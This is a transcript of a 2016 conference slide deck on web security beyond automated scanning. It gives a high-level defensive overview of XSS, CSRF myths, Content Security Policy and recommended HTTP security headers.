$30 off During Our Annual Pro Sale. View Details »

Beyond Scanning

Dheeraj Joshi
November 15, 2016

Beyond Scanning

Slides from my talk at SeleniumConf UK 2016!

Dheeraj Joshi

November 15, 2016
Tweet

More Decks by Dheeraj Joshi

Other Decks in Technology

Transcript

  1. Let’s talk Security
    Beyond Scanning
    Dheeraj Joshi
    @dheerajhere

    View Slide

  2. ● Front-End @
    ● Previously @
    ● Open Source (medium-cli)
    ● Ambidextrous TT Player
    About Me

    View Slide

  3. More...
    Uber, CKEditor, Dropbox,
    MailChimp, Recruiterbox, InVision,
    DigitalOcean, Intuit, Groupon, etc.
    What makes me happy?

    View Slide

  4. In this talk...
    ● Why ?
    ● Cross-site Scripting (XSS)
    ● Cross-site Request Forgery (CSRF)
    ● Content Security Policy (CSP)
    ● HTTP Security Headers
    ● Best Practices & Demo

    View Slide

  5. Why should we Care
    about Security?
    Startups & SMEs are known to cut
    corners. One of the first things they
    cut is ‘Security'.

    View Slide

  6. View Slide

  7. View Slide

  8. View Slide

  9. Password Reuse
    Attacks

    View Slide

  10. HACKER PUTS HOSTING SERVICE “CODE
    SPACES” OUT OF BUSINESS
    The Shutdown

    View Slide

  11. CROSS SITE SCRIPTING - XSS
    ● XSS attack users
    ● Inject Malicious content
    ● Exploits can be real
    bad

    View Slide

  12. What is XSS?
    Typical Reflected XSS

    View Slide

  13. Stored XSS

    View Slide

  14. DOM XSS

    View Slide

  15. Hunt...
    ● Data <-> Code
    ● Input Validation
    ● Check HTML Encoding
    ● Sanitizers
    ● Analyze places where DOM
    elements are created

    View Slide

  16. XSS via template injection
    Using Sandbox Bypasses
    http://blog.portswigger.net/2016/04/adapting-angularjs
    -payloads-to-exploit.html

    View Slide

  17. ● Check for HTTPOnly, Secure flag on Session
    Cookie

    View Slide

  18. CROSS-SITE REQUEST
    FORGERY (CSRF)

    View Slide

  19. Because the attack is carried out
    by the victim, CSRF can bypass:
    ● HTTP Auth
    ● Session-based auth
    ● Firewalls
    CSRF Attacks

    View Slide

  20. ● Only accepting POST requests
    ● Referer Protection
    ● Multi-Step Transactions
    ● URL Rewriting
    ● application/json
    “CSRF Myths”
    Preventions that Won’t work

    View Slide

  21. XSS + CSRF = ?

    View Slide

  22. Content Security Policy (CSP)
    CSP Evaluator
    (https://csp-evaluator.withgoogle.com)

    View Slide

  23. HTTP Security headers
    ● Strict-Transport-Security:
    max-age=16070400; includeSubDomains
    ● X-Frame-Options: deny
    ● X-XSS-Protection: 1; mode=block
    ● X-Content-Type-Options: nosniff

    View Slide

  24. Defense
    ● Strategy - Integrate into SDLC
    ● Static Code Analysis
    ● Security Audits
    ● CTFs

    View Slide

  25. Show Time !

    View Slide

  26. Questions ?

    View Slide

  27. Thank you
    @dheerajhere
    @djadmin

    View Slide